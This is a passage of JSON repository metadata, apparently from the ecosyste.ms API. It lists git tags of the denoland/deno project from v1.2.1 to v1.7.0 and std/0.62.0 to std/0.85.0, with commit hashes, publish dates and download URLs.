85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":